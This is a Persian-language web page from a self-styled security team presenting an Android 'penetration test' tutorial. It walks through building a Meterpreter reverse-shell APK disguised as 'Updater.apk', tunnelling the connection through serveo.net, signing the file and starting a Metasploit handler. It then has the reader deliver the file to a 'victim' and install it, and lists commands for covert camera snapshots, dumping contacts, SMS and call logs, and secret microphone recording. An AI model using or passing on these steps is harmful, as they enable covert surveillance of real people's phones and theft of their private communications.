توضیح تصویر
  • 98XXXXXXXXXX+
  • mynymhmd2@gmail.com
  • TEHRAN-IRAN
  • 98914XXXXXXX+
تیم دکترسکیوریتی

Dr.Security Team

Android - Windows - Linux

توضیح تصویر

تست و نفوذ اندروید

تست و نفوذ اندروید

لازمه های این تست نفوذ

۱) یک گوشی اندرویدی

۲) نرم افزار Android TermuX (دانلود از فروشگاه Play)

۳) فریم ورک Metasploit نصب شده در TermuX 

۴) اینترنت فعال / اتصال WiFi

۵) TermuX باید اجازه استفاده از Storage External را داشته باشد (برای این منظور فقط یکبار این فرمان را وارد کنید: “termux-setup-storage”)

۶) MiXplorer (برای امضای فایل APK، آن را از وب سایت UpToDown دانلود کنید)

۷) Apk Signer) MiX Signer برای MiXplorer، دانلود آن از فروشگاه Play)

Port Forwarding

بسیاری از مردم برای پورت فورواردینگ از NGROK استفاده می کنند. اما در NGROK، می توانید ببینید که در هنگام اتصال مجدد به آن دامنه یا پورت جدید ایجاد می شود. دامنه و پورت اختصاصی هم فقط برای کاربران ویژه است. به همین دلیل، برای NGROK شما هر بار که شروع به هک می کنید، باید یک فایل APK جدید ایجاد کنید.

در این اموزش ما از Serveo استفاده می کنیم. در Serveo، شما می توانید به طور دستی پورت مورد نظر خود را در اینترنت ارسال کنید. برای استفاده از پورت فورواردینگ Serveo، شما باید بسته OpenSSH را بر روی TermuX نصب کنید. برای این کار، دستور زیر را در TermuX وارد کنید:

pkg install openssh

پس از نصب، این دستور را تایپ کنید:

ssh -R (Desired_Port):localhost:(Desired_Port) serveo.net

در اینجا شما باید برخی از نکات را در نظر داشته باشید؛ اگر شما می خواهید یک پورت HTTP را فوروارد کنید، سپس پورت های مختلف را در هر دو قسمت “Desired_Port” انتخاب کنید. اما در اینجا می خواهیم یک پورت TCP را پیش ببریم. برای فوروارد پورت TCP، شما باید در پورت Desired_Ports همان پورت های مورد نظر را وارد کنید. همچنین “localhost” را تغییر ندهید. در اینجا ما قصد داریم یک پورت TCP را(برای مثال ۴۵۶۴) Forward کنیم. پس از پورت فوروارد، ممکن است به صورت زیر باشد:

ساخت فایل apk به همراه پیلود جاسازی شده

برای ایجاد فایل APK با Embedload Payload، این دستور را در ترموکس وارد میکنیم:

msfvenom -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=4564 R
> storage/downloads/Updater.apk

بعد از چند ثانیه منتظر ماندن:

همانطور که مشاهده میکنید فایل APK با پیلود جاسازی شده با موفقیت برای ما ساخته شد. Phone/SD-Card Storage -> downloads -> Updater.apk

همچنین شما می توانید با استفاده از برنامه APK Editor Pro نام (Default: MainActivity) و نسخه فایل APK تولید شده را تغییر دهید.

امضای فایل جدید APK ایجاد شده

ابتدا مدیر فایل MiXplorer را باز کنید و به فایل (APK Un-Signed (Updater.apk بروید.(در پوشه ی آپلود قرار می گیرد).

انگشت خود را بر روی (APK Un-Signed (Updater.apk فشار دهید و دکمه MENU را در گوشه بالا سمت راست MiXplorer انتخاب کنید، سپس “SIGN” را انتخاب کنید.

این گزینه برای ما امضای فایل APK را نمایش میدهد. “AUTO” را انتخاب کنید تا فایل APK را به صورت خودکار و با موفقیت امضا کنید.

در حال حاضر، فایل APK شما با نام filename)-signed.apk) با موفقیت امضا شده است و حجم ان نیز ۹٫۹KB میباشد.

راه اندازی Metasploit در TermuX

با وارد کردن دستور زیر در پنجره جدید ترموکس، چارچوب Metasploit را در TermuX فعال کنید:

msfconsole

نکته(۱): اگر Metasploit-Framework را در برنامه TermuX خود نصب نکرده اید، میتوانید از طریق این لینک اقدام به نصب کنید.

نکته(۲): اگر این خطا را دریافت کردید: “Failed to connect to the database”، همانطور که در تصویر زیر نشان داده شد، دستورات زیر را در NEW SESSION وارد کنید.

mkdir -p $PREFIX/var/lib/postgresql
initdb $PREFIX/var/lib/postgresql
pg_ctl -D $PREFIX/var/lib/postgresql start

بعد از چند ثانیه منتظر ماندن:

بعد از اینکه ابزار msfconsole شروع به کار می کند، دستورات زیر را با دقت وارد کنید:

msf> use exploit/multi/handler
msf> set payload android/meterpreter/reverse_tcp
msf> set LHOST localhost
msf> set LPORT 4564
msf> exploit -j -z

نصب APK در گوشی Android تارگت

باید فایل Payload-Signed.apk را به دستگاه اندروید قربانی خود (به عنوان مثال از طریق بلوتوث) ارسال کنید -> آن را نصب کنید -> سپس آن را باز کنید (اطمینان حاصل کنید که دستگاه قربانی دارای اتصال به اینترنت فعال است).

پس از باز کردن فایل APK در تلفن قربانی، خواهید دید که جلسه Meterpreter در قسمت Metasploit شما فعال خواهد شد. برای باز کردن جلسه Meterpreter از دستگاه قربانی خود، روی دکمه “بازگشت” کلیک کنید و این فرمان را در جلسه Metasploit وارد کنید:

(sessions -i (Session ID

در (شناسه جلسه)، شماره جلسه Meterpreter را انتخاب کنید (به عنوان مثال هنگامی که قربانی شما فایل APK را باز می کند، این پیام را میبینید: Meterpreter Session Opened 1، در اینجا، ۱، شناسه جلسه Meterpreter است).

تبریک……!!!!!!!! شما با موفقیت از Android دستگاه قربانی خود دسترسی گرفتید.

در محیط متااسپلویت نیاز به راهنمایی دارید:

می توانید فرمان {meterpreter> help} را برای مشاهده تمام دستورات در دسترس وارد کنید.

از جمله دستورات مهم:

گرفتن تصویر از دوربین ها

webcam_snap -i 2 -p storage/downloads/X-Stealth-Snapshot-F.jpg

webcam_snap -i 1 -p storage/downloads/X-Stealth-Snapshot-R.jpg

دریافت همه مخاطبین

dump_contacts -o storage/downloads/X-Contacts.txt

دریافت همه پیام ها

dump_sms -o storage/downloads/X-SMS.txt

دریافت تماس های ورودی

dump_calllog -o storage/downloads/X-CallLog.txt

جاسوسی از طریق میکروفون

record_mic -d 10 -f storage/downloads/X-Spy-Record.mp3
 
سفارش محصول
ابتدا یکبار کدامنیتی را تعویض سپس وارد کنید
 
 
تنها امکان ارسال نظر خصوصی وجود دارد
شما میتوانید از این تگهای html استفاده کنید:
<b> یا <strong>، <em> یا <i>، <u>، <strike> یا <s>، <sup>، <sub>، <blockquote>، <code>، <pre>، <hr>، <br>، <p>، <a href="" title="">، <span style="">، <div align="">
تجدید کد امنیتی
نظر شما به هیچ وجه امکان عمومی شدن در قسمت نظرات را ندارد، و تنها راه پاسخگویی به آن نیز از طریق پست الکترونیک می‌باشد. بنابراین در صورتیکه مایل به دریافت پاسخ هستید، پست الکترونیک خود را وارد کنید.